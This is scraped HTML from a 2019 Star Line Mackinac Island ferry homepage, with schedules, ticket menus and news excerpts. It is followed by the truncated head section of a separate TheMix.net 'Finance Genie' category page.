offcanvas_dock2Sel.change(function(){ offcanvas_formSchedId.val(2); offcanvas_formDockId.val(offcanvas_dock2Sel.val()); offcanvas_dockForm.submit(); }); var offcanvas_dock3Sel = $('#oc-sched-3'); offcanvas_dock3Sel.change(function(){ offcanvas_formSchedId.val(3); offcanvas_formDockId.val(offcanvas_dock3Sel.val()); offcanvas_dockForm.submit(); }); var offcanvas_dock4Sel = $('#oc-sched-4'); offcanvas_dock4Sel.change(function(){ offcanvas_formSchedId.val(4); offcanvas_formDockId.val(offcanvas_dock4Sel.val()); offcanvas_dockForm.submit(); }); var offcanvas_dock5Sel = $('#oc-sched-5'); offcanvas_dock5Sel.change(function(){ offcanvas_formSchedId.val(5); offcanvas_formDockId.val(offcanvas_dock5Sel.val()); offcanvas_dockForm.submit(); }); var offcanvas_mapLink1 = $('#offcanvas-google-map-link1'); offcanvas_mapLink1.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=1'; return false; }); var offcanvas_mapLink2 = $('#offcanvas-google-map-link2'); offcanvas_mapLink2.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=2'; return false; }); var offcanvas_mapLink3 = $('#offcanvas-google-map-link3'); offcanvas_mapLink3.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=3'; return false; }); var offcanvas_mapLink4 = $('#offcanvas-google-map-link4'); offcanvas_mapLink4.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=4'; return false; }); var offcanvas_mapLink5 = $('#offcanvas-google-map-link5'); offcanvas_mapLink5.click(function(){ window.location = 'https://www.mackinacferry.com/schedules/?mapLink=5'; return false; }); }); </script> <div id="oc_schedule_wrapper" class="common_schedule_wrapper"> <form id="oc_dockForm" name="oc_dockForm" action="https://www.mackinacferry.com/schedules/" method="get"> <input type="hidden" id="oc_formDockId" name="dockId"> <input type="hidden" id="oc_formSchedId" name="scheduleId"> <div class="dock-tab dock-mc"> <a href="#" class="google-map-link" data-location="Star Line Mackinac Island Ferry,801 S Huron St,Mackinaw City,MI"> <h2>Mackinaw City-Main Dock #1</h2> <img style="min-width:auto;min-height:auto;background:none !important;" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon-red.png"> </a> <select id="oc-sched-3"><option value="">Choose Schedule</option> <option value="105">Apr 29th - Jun 6th</option> <option value="106">Jun 7th - Jun 20th</option> <option value="107">Jun 21st - Aug 25th</option> <option value="108">Aug 26th - Sep 2nd</option> <option value="109">Sep 3rd - Oct 27th</option> <option value="110">Oct 28th - Oct 31st</option></select> <div class="dock_img_wrapper"><img src="https://ticket.mackinacferry.com/assets/maps/nav-MAP-Mackinaw-Dock1.jpg" alt="temp-dock-mack (14K)"></div> </div> <div class="dock-tab dock-main"> <a href="#" class="google-map-link" data-location="587 N State St,Saint Ignace, MI"> <h2>St Ignace - Main Dock #3</h2> <img style="min-width:auto;min-height:auto;background:none !important;" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon-red.png"> </a> <select id="oc-sched-1"><option value="">Choose Schedule</option> <option value="9">Apr 29th - Jun 9th</option> <option value="50">Jun 10th - Sep 2nd</option> <option value="51">Sep 3rd - Oct 27th</option> <option value="14">Oct 28th - Oct 31st</option></select> <div class="dock_img_wrapper"><img src="https://ticket.mackinacferry.com/assets/maps/nav-MAP-St-Ignace-Dock1.jpg" alt="temp-dock-mack (14K)"></div> </div> <div class="dock-tab dock-rail"> <a href="#" class="google-map-link" data-location="Star Line Mackinac Island Ferry,227 S State St, Saint Ignace, MI"> <h2>St. Ignace-Rail Road Dock #1</h2> <img style="min-width:auto;min-height:auto;background:none !important;" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/map-pin-icon-red.png"> </a> <select id="oc-sched-2"><option value="">Choose Schedule</option> <option value="24">Jun 21st - Aug 25th</option> <option value="103">Aug 31st - Sep 1st</option></select> <div class="dock_img_wrapper"><img src="https://ticket.mackinacferry.com/assets/maps/nav-MAP-St-Ignace-Dock3.jpg" alt="temp-dock-mack (14K)"></div> </div> <div class="clearer"></div><div class="clearer"></div> </form> </div> <div class="left-off-canvas-list"><ul><li class="page_item"><a href="https://www.mackinacferry.com">Home</a></li><li class="tickets-menu menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children page_item_has_children page_item menu-item-515"><a href="https://tickets.mackinacferry.com/webstore/landingpage?cg=ferrytickets&#038;c=TICKETS">Tickets</a> <ul class="children"> <li class="menu-item menu-item-type-custom menu-item-object-custom page_item menu-item-848"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=TICKETS">Hydro-Jet Ferrry Tickets to Mackinac Island</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-489"><a href="https://www.mackinacferry.com/order-tickets-online/mack-pass-package/">mackPASS Discount Packages</a></li> <li class="family-specials menu-item menu-item-type-custom menu-item-object-custom page_item menu-item-603"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=FAMILYSPECIALS">Family Specials</a></li> <li class="multiple-trips menu-item menu-item-type-custom menu-item-object-custom page_item menu-item-514"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=MULTIPLEDAY">Multiple Day Tickets</a></li> <li class="classic-ferry menu-item menu-item-type-custom menu-item-object-custom page_item menu-item-1270"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&#038;c=CLASSIC">Classic Ferry Economy Tickets</a></li> <li class="all-ticket-options menu-item menu-item-type-custom menu-item-object-custom page_item menu-item-851"><a href="https://tickets.mackinacferry.com/webstore/landingPage">All Ticket Options</a></li> </ul></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-1153"><a href="https://www.mackinacferry.com/schedules/">Schedules</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children page_item_has_children page_item menu-item-377"><a href="https://www.mackinacferry.com/groups-and-cruises/">Groups &#038; Events</a> <ul class="children"> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-392"><a href="https://www.mackinacferry.com/groups-and-cruises/fireworks-cruise/">Fireworks Cruise</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-391"><a href="https://www.mackinacferry.com/groups-and-cruises/sunset-cruise/">Sunset Cruises</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom page_item menu-item-1293"><a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=MACKINAC&#038;c=Bridgewalkboats">Labor Day Bridge Walk Boat Departures!</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-235"><a href="https://www.mackinacferry.com/groups-and-cruises/weddings/">Weddings</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-236"><a href="https://www.mackinacferry.com/groups-and-cruises/private-party-boat-anna-may/">Custom Party Boat Cruises</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-234"><a href="https://www.mackinacferry.com/groups-and-cruises/2019-group-packages/">2019 Adult Group Packages</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-473"><a href="https://www.mackinacferry.com/groups-and-cruises/fourth-of-july-fireworks-cruise/">Fourth of July Fireworks Cruise</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-1464"><a href="https://www.mackinacferry.com/groups-and-cruises/chicagoyachtclubracetomackinac/">Chicago Yacht Club Race to Mackinac</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-1465"><a href="https://www.mackinacferry.com/groups-and-cruises/runmackinac/">Run Mackinac</a></li> </ul></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-1488"><a href="https://www.mackinacferry.com/about-us/freight-2/">Freight</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children page_item_has_children page_item menu-item-239"><a href="https://www.mackinacferry.com/about-us/">About</a> <ul class="children"> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-292"><a href="https://www.mackinacferry.com/about-us/faq/">FAQ About Traveling to Mackinac Island</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-299"><a href="https://www.mackinacferry.com/about-us/area-info/">Mackinac Island and Straits of Mackinac Area Info</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-390"><a href="https://www.mackinacferry.com/about-us/employment-2/">Employment</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-389"><a href="https://www.mackinacferry.com/about-us/freight-2/">Getting Freight to Mackinac Island</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-1310"><a href="https://www.mackinacferry.com/about-us/millslip/">Boat Storage</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-293"><a href="https://www.mackinacferry.com/about-us/security-notice/">Security Notice</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page page_item menu-item-297"><a href="https://www.mackinacferry.com/about-us/videos/">Fun Videos of Star Line and Mackinac Island</a></li> </ul></li> </ul></div><!-- <form role="search" method="get" class="searchform" action="https://www.mackinacferry.com/"> <input class="search-input" type="text" placeholder="Search" value="" name="s"> <input class="search-button button" type="submit" value="Search" name="submit"> </form>--> <ul id="oc-sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-326" id="menu-item-326"><a href="https://www.mackinacferry.com/about-us/freight-2/">Freight</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-360" id="menu-item-360"><a href="https://www.mackinacferry.com/about-us/boat-yard-2/">Boat Yard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-225" id="menu-item-225"><a href="https://www.mackinacferry.com/about-us/parking/">Parking</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-227" id="menu-item-227"><a href="https://www.mackinacferry.com/about-us/fun-coupons/">Fun Coupons</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-483" id="menu-item-483"><a href="https://www.mackinacferry.com/about-us/e-news-signup/">E-News</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226" id="menu-item-226"><a href="https://www.mackinacferry.com/about-us/employment-2/">Employment</a></li> </ul> <ul class="oc-client-info"> <li>Star Line Mackinac Island Ferry</li> <li>587 N. State St</li> <li>St. Ignace, MI 49781</li> <li>801 S. Huron St</li> <li>Mackinaw City, MI 49701</li> <li>800-638-9892</li> <a class="mail" href="https://www.mackinacferry.com/about-us/contact-us/">Contact Us</a> </ul> <ul class="offcanvas-social-list"> <li><a class="facebook" href="https://www.facebook.com/starlineferry/" target="_blank"></a></li> <li><a class="insta" href="https://www.instagram.com/explore/locations/275623542/" target="_blank"></a></li> <li><a class="tube" href="https://www.youtube.com/channel/UCeym3wynlVDPpVs3kmbBeGQ" target="_blank"></a></li> <li><a class="blog" href="https://www.mackinacferry.com/about-us/news/"></a></li> </ul> </aside> <!-- <aside class="right-off-canvas-menu show-for-medium-down"> <form action=""></form> </aside> --> <main class="page-front"> <div id="slideshow"> <!-- <ul> </ul> --> <video id="front-page-video" playsinline autoplay loop muted> <source src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/starline.m4v" type="video/mp4"> </video> <div class="overlay1"></div> <!-- <div class="overlay2"></div> --> </div> <div id="content-wrapper"> <div class="content-container"> <div class="overlay"></div> <div class="overlay"></div> <div id="block-row" class="row medium-uncollapse large-collapse" data-equalizer data-options="equalize_on_stack: false"> <div class="blocks"> <div class="text-center small-centered small-12 medium-4 medium-uncentered columns medium-text-left block"> <a class="title-posts" href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&c=FAMILYSPECIALS" target="_blank"> <h4>Family Specials</h4> </a> <a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&c=FAMILYSPECIALS"> <img width="290" height="190" src="https://www.mackinacferry.com/wp-content/uploads/2017/05/Family-Specials-290x190.jpg" class="attachment-glm-block-image size-glm-block-image wp-post-image" alt="" /> </a> </div> <div class="text-center small-centered small-12 medium-4 medium-uncentered columns medium-text-left block"> <a class="title-posts" href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&c=TICKETS" target="_blank"> <h4>Ferry Tickets</h4> </a> <a href="https://tickets.mackinacferry.com/webstore/shop/viewItems.aspx?cg=ferrytickets&c=TICKETS"> <img width="290" height="190" src="https://www.mackinacferry.com/wp-content/uploads/ngg_featured/IMG_0938-290x190.jpg" class="attachment-glm-block-image size-glm-block-image wp-post-image" alt="" /> </a> </div> <div class="text-center small-centered small-12 medium-4 medium-uncentered columns medium-text-left block"> <a class="title-posts" href="https://www.mackinacferry.com/about-us/parking/"> <h4>Parking & Tickets</h4> </a> <a href="https://www.mackinacferry.com/about-us/parking/"> <img width="290" height="190" src="https://www.mackinacferry.com/wp-content/uploads/2017/03/is17-1402262296-94275-e1532971603910-290x190.png" class="attachment-glm-block-image size-glm-block-image wp-post-image" alt="" /> </a> </div> </div> </div> <div class="row"> <div id="main-content" class="small-11 small-centered text-center columns"> <div class="pf-content"><h1><span style="font-size: 24pt;">Star Line Mackinac Island&#8217;s Hydro-Jet® Ferry</span></h1> <p>NEW, You Ride, Your Way! Hydro-Jet, Catamaran and Classic Ferry service to Mackinac Island. Let speed , comfort, leisure and price factor help you decide. You will love the Heroic Service and Mackinac Memories our employees have been providing since 1978.</p> <p>&nbsp;</p> <p>&nbsp;</p> </div> </div> </div> </div> <!-- <div class="small-12 medium-6 large-4 columns small-text-center medium-text-left"> </div> --> <div class="action-items"> <div class="row"> <div class="buy-tickets small-12 medium-6 text-center columns"> <a href="https://tickets.mackinacferry.com/webstore/landingpage?cg=ferrytickets&c=TICKETS"><img src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/buy-tickets-graphics-2.png"></a> <a href="https://tickets.mackinacferry.com/webstore/landingpage?cg=ferrytickets&c=TICKETS"><h5>Buy Ferry <br>Tickets</h5></a> </div> <div class="get-schedule small-12 medium-6 text-center columns"> <a href="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/schedules/2019schedule.pdf?v=1.0.44" target="_blank"> <img src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/schedules/schedulecover.png?v=1.0.44"> </a> <a href="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/schedules/2019schedule.pdf?v=1.0.44" target="_blank"><h5>Download <br>Schedule</h5></a> </div> </div> </div> <div class="row"> <div id="blog-feed" class="small-12 small-centered columns"> <div id="home-feed-posts"> <div class="home-feed-post small-12 columns"> <h2 class="title-posts" href="https://www.mackinacferry.com/2019-winter-ferry-service-to-resume-friday-april-5th/"><a href="https://www.mackinacferry.com/2019-winter-ferry-service-to-resume-friday-april-5th/">2019 Winter Ferry Service to Resume Friday, April 5th</a></h2> <div class="row"> <div class="small-12 small-centered medium-uncentered medium-4 columns text-center home-feed-post-image"> <img width="190" height="127" src="https://www.mackinacferry.com/wp-content/uploads/2019/04/Huron-April-3-breaking-out-of-harbor.jpg" class="blog-excerpt-img-wrap wp-post-image" alt="" srcset="https://www.mackinacferry.com/wp-content/uploads/2019/04/Huron-April-3-breaking-out-of-harbor.jpg 1024w, https://www.mackinacferry.com/wp-content/uploads/2019/04/Huron-April-3-breaking-out-of-harbor-300x200.jpg 300w, https://www.mackinacferry.com/wp-content/uploads/2019/04/Huron-April-3-breaking-out-of-harbor-768x512.jpg 768w" sizes="(max-width: 190px) 100vw, 190px" /> </div> <div class="small-12 medium-8 columns home-feed-post-content"> <span class="meta date">Posted on April 4th, 2019</span> <div class="excerpt0"> Great News!  Star Line Mackinac Island Winter Ferry Service will resume operations on Friday, April 5th, 2019.  We will be running out of St Ignace Dock #2, 99 N State St, St Ignace, MI, 49781.  Follow the link below for a full ferry schedule: <span style="font-size: 18pt;">2019 Winter Service Ferry Schedule</span>&hellip; </div> </div> <!-- end .home-feed-post-content --> </div> <!-- end .row --> </div> <!-- end .home-feed-post --> <div class="home-feed-post small-12 columns"> <h2 class="title-posts" href="https://www.mackinacferry.com/job-fair-saturday-at-audies-in-mackinaw-city/"><a href="https://www.mackinacferry.com/job-fair-saturday-at-audies-in-mackinaw-city/">JOB FAIR Saturday at Audie&#8217;s in Mackinaw City!!</a></h2> <div class="row"> <div class="small-12 small-centered medium-uncentered medium-4 columns text-center home-feed-post-image"> <img width="190" height="143" src="https://www.mackinacferry.com/wp-content/uploads/2019/03/20180811_174159.jpg" class="blog-excerpt-img-wrap wp-post-image" alt="" srcset="https://www.mackinacferry.com/wp-content/uploads/2019/03/20180811_174159.jpg 4032w, https://www.mackinacferry.com/wp-content/uploads/2019/03/20180811_174159-300x225.jpg 300w, https://www.mackinacferry.com/wp-content/uploads/2019/03/20180811_174159-768x576.jpg 768w, https://www.mackinacferry.com/wp-content/uploads/2019/03/20180811_174159-1024x768.jpg 1024w" sizes="(max-width: 190px) 100vw, 190px" /> </div> <div class="small-12 medium-8 columns home-feed-post-content"> <span class="meta date">Posted on March 13th, 2019</span> <div class="excerpt1"> <span style="font-size: 14pt;">Star Line Mackinac Island Ferry Company</span> is hosting a Job Fair at Audie&#8217;s in Mackinaw City on Saturday, March 16th, 2019 from 1-3 PM.  We are currently hiring for ALL POSITIONS for the 2019 summer season. Make the most of your summer working on the water and get paid for it!  Stop by and talk to current employees,&hellip; </div> </div> <!-- end .home-feed-post-content --> </div> <!-- end .row --> </div> <!-- end .home-feed-post --> </div> <!-- end #home-feed-posts --> </div> </div> </div> </main><!--End of main--> <div id="space" class="opensearchserver.ignore"> <h1>#StarLineFerry</h1> </div> <footer class="main opensearchserver.ignore"> <div class="row"> <div class="footer-logo small-10 small-centered medium-uncentered medium-3 large-2 columns small-text-center"> <a href="https://www.mackinacferry.com"><img alt="footer logo" src="https://www.mackinacferry.com/wp-content/themes/mackinawferry/assets/star-line-circle-logo.png"></a> </div> <div class="medium-4 columns show-for-medium-up foot-menu"> <ul id="menu-footer-1"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-326"><a href="https://www.mackinacferry.com/about-us/freight-2/">Freight</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-360"><a href="https://www.mackinacferry.com/about-us/boat-yard-2/">Boat Yard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-225"><a href="https://www.mackinacferry.com/about-us/parking/">Parking</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-227"><a href="https://www.mackinacferry.com/about-us/fun-coupons/">Fun Services</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-483"><a href="https://www.mackinacferry.com/about-us/e-news-signup/">E-News</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226"><a href="https://www.mackinacferry.com/about-us/employment-2/">Employment</a></li> </ul> </div> <div class="address-container medium-5 columns show-for-medium-up"> <div id="footer_address"> <div class="location_1"> <span class="address_1_street">ST IGNACE DOCK, 587 N. State St</span> <br> <span class="address_1_region">St. Ignace, MI 49781</span><br> </div> <div class="location_2"> <!-- <span class="bullet"> &#8226; </span>--> <span class="address_2_street">MACKINAW CITY DOCK, 801 S. Huron St</span> <br> <span class="address_2_region">Mackinaw City, MI 49701</span> </div> <span class="phone">800-638-9892</span> <a class="mail" href="https://www.mackinacferry.com/about-us/contact-us/">Contact Us</a> </div> <ul class="social"> <li><a class="facebook" href="https://www.facebook.com/starlineferry/" target="_blank"></a></li> <li><a class="insta" href="https://www.instagram.com/explore/locations/275623542/" target="_blank"></a></li> <li><a class="tube" href="https://www.youtube.com/channel/UCeym3wynlVDPpVs3kmbBeGQ" target="_blank"></a></li> <li><a class="blog" href="https://www.mackinacferry.com/about-us/news/"></a></li> </ul> </div> </div> </footer> <div id="copyright" class="opensearchserver.ignore"> <span>Copyright &copy; 2019 </span> <span class="bullet"> &#8226; </span> <span> Produced by <a target="_blank" href="http://www.gaslightmedia.com">Gaslight Media</a></span> <span class="bullet"> &#8226; </span> <span> All Rights Reserved.</span> </div> <a class="exit-off-canvas"></a> </div><!--/#page-wrapper--> </div><!--End of inner-wrap--> </div><!--End of off-canvas--> <!-- ngg_resource_manager_marker --><script type='text/javascript' src='https://www.mackinacferry.com/wp-content/themes/mackinawferry/js/app.js?ver=1.0.2'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/datepicker.min.js?ver=1.11.4'></script> <script type='text/javascript'> jQuery(document).ready(function(jQuery){jQuery.datepicker.setDefaults({"closeText":"Close","currentText":"Today","monthNames":["January","February","March","April","May","June","July","August","September","October","November","December"],"monthNamesShort":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],"nextText":"Next","prevText":"Previous","dayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"dayNamesShort":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"dayNamesMin":["S","M","T","W","T","F","S"],"dateFormat":"MM d, yy","firstDay":0,"isRTL":false});}); </script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/resizable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-includes/js/jquery/ui/dialog.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/js/front.js?ver=2.10.48'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/plugins/glm-member-db-apis/js/front.js?ver=2.10.48'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/js/fullcalendar/lib/moment.min.js?ver=2.10.48'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/js/fullcalendar/fullcalendar.min.js?ver=2.10.48'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/js/fullcalendar/lang-all.js?ver=2.10.48'></script> <script type='text/javascript' src='https://www.mackinacferry.com/wp-content/plugins/glm-member-db/js/jquery.asmselect.js?ver=1.0.4a'></script> <!-- Piwik --> <script type="text/javascript"> var _paq = _paq || []; _paq.push(['trackPageView']); _paq.push(['enableLinkTracking']); (function() { var u="//stats.gaslightmedia.com/"; _paq.push(['setTrackerUrl', u+'piwik.php']); _paq.push(['setSiteId', 65]); var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0]; g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; s.parentNode.insertBefore(g,s); })(); </script> <!-- End Piwik Code --> <script type="text/javascript"> var pfHeaderImgUrl = ''; var pfHeaderTagline = ''; var pfdisableClickToDel = '0'; var pfImagesSize = 'full-size'; var pfImageDisplayStyle = 'right'; var pfDisableEmail = '0'; var pfDisablePDF = '0'; var pfDisablePrint = '0'; var pfCustomCSS = ''; var pfPlatform = 'Wordpress'; (function() { var e = document.createElement('script'); e.type="text/javascript"; e.src = 'https://cdn.printfriendly.com/printfriendly.js'; document.getElementsByTagName('head')[0].appendChild(e); })(); </script> <script charset="utf-8" type="text/javascript">var switchTo5x=true;</script> <script charset="utf-8" type="text/javascript" src="https://ws.sharethis.com/button/buttons.js"></script> <script charset="utf-8" type="text/javascript">stLight.options({"publisher":"wp.c3d3647e-de70-4780-b71d-6b739fad685a"});var st_type="wordpress4.3.1";</script> </body> </html>
0
<!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="dns-prefetch" href="//cloudflare.com"> <link rel="dns-prefetch" href="//cdnjs.cloudflare.com"> <link rel="dns-prefetch" href="//themix.net"> <link rel="dns-prefetch" href="//www.themix.net"> <link rel="dns-prefetch" href="//quantcast.com"> <link rel="dns-prefetch" href="//quantserve.com"> <link rel="dns-prefetch" href="//secure.quantserve.com"> <link rel="dns-prefetch" href="//edge.quantserve.com"> <link rel="dns-prefetch" href="//pixel.quantserve.com"> <link rel="dns-prefetch" href="//google-analytics.com"> <link rel="dns-prefetch" href="//pagead2.googlesyndication.com"> <link rel="dns-prefetch" href="//googletagservices.com"> <link rel="dns-prefetch" href="//fonts.googleapis.com"> <link rel="dns-prefetch" href="//google.com"> <link rel="dns-prefetch" href="//clients6.google.com"> <link rel="dns-prefetch" href="//plus.google.com"> <link rel="dns-prefetch" href="//facebook.com"> <link rel="dns-prefetch" href="//graph.facebook.com"> <link rel="dns-prefetch" href="//connect.facebook.net"> <link rel="dns-prefetch" href="//twitter.com"> <link rel="dns-prefetch" href="//platform.twitter.com"> <link rel="dns-prefetch" href="//api.twitter.com"> <link rel="dns-prefetch" href="//urls.api.twitter.com"> <link rel="dns-prefetch" href="//youtube.com"> <link rel="dns-prefetch" href="//img.youtube.com"> <link rel="dns-prefetch" href="//vimeo.com"> <link rel="dns-prefetch" href="//player.vimeo.com"> <link rel="dns-prefetch" href="//vimeocdn.com"> <link rel="dns-prefetch" href="//a.vimeocdn.com"> <link rel="dns-prefetch" href="//b.vimeocdn.com"> <link rel="dns-prefetch" href="//secure-a.vimeocdn.com"> <link rel="dns-prefetch" href="//secure-b.vimeocdn.com"> <title>The Finance Genie | TheMix.net</title> <link href="https://fonts.googleapis.com/css?family=Hind:300,400,500,600,700|Montserrat:100,200,300,400,500,600,700,800,900" rel="stylesheet"> <link href="https://www.themix.net/css/v1/global.css?ver=1.0.5" type="text/css" title="default" rel="stylesheet" media="screen, print" /> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-134627247-1"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'UA-134627247-1');</script> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-134627247-10"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'UA-134627247-10');</script> <link rel="canonical" href="https://www.themix.net/category/thefinancegenie/" /> <link rel="next" href="https://www.themix.net/category/thefinancegenie/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="object" /> <meta property="og:title" content="The Finance Genie | TheMix.net" /> <meta property="og:description" content="The Finance Genie understands the importance of financial literacy and creating a solid foundation for future financial success." /> <meta property="og:url" content="https://www.themix.net/category/thefinancegenie/" /> <meta property="og:site_name" content="TheMix.net" /> <meta property="og:image" content="https://www.themix.net/files/2019/02/2019.02.19-09.52-themixnet-5c6c7aba55268.jpg" /> <meta property="og:image:secure_url" content="https://www.themix.net/files/2019/02/2019.02.19-09.52-themixnet-5c6c7aba55268.jpg" /> <meta property="og:image:width" content="1200" /> <meta property="og:image:height" content="750" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="The Finance Genie understands the importance of financial literacy and creating a solid foundation for future financial success." /> <meta name="twitter:title" content="The Finance Genie | TheMix.net" /> <meta name="twitter:image" content="https://www.themix.net/files/2019/02/2019.02.19-09.52-themixnet-5c6c7aba55268.jpg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"https://www.themix.net/#organization","name":"TellMeNow, LLC","url":"https://www.themix.net/","sameAs":["https://www.facebook.com/themixnet/"],"logo":{"@type":"ImageObject","@id":"https://www.themix.net/#logo","url":"https://www.themix.net/files/2019/03/2019.03.12-06.59-themixnet-5c880187411f1.jpg","width":278,"height":160,"caption":"TellMeNow, LLC"},"image":{"@id":"https://www.themix.net/#logo"}},{"@type":"WebSite","@id":"https://www.themix.net/#website","url":"https://www.themix.net/","name":"TheMix.net","publisher":{"@id":"https://www.themix.net/#organization"},"potentialAction":{"@type":"SearchAction","target":"https://www.themix.net/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"CollectionPage","@id":"https://www.themix.net/category/thefinancegenie/#webpage","url":"https://www.themix.net/category/thefinancegenie/","inLanguage":"en-US","name":"The Finance Genie | TheMix.net","isPartOf":{"@id":"https://www.themix.net/#website"}}]}</script> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com' /> <link rel='dns-prefetch' href='//malsup.github.io' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="TheMix.net &raquo; The Finance Genie Category Feed" href="https://www.themix.net/category/thefinancegenie/feed/" /> <link rel='stylesheet' id='wp-block-library-css' href='https://www.themix.net/wp-includes/css/dist/block-library/style.min.css?ver=5.2' type='text/css' media='all' /> <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js?ver=3.3.1'></script> <script src='https://cdnjs.cloudflare.com/ajax/libs/masonry/4.2.2/masonry.pkgd.min.js?ver=4.2.2'></script> <script src='https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js?ver=2.3.4'></script> <script 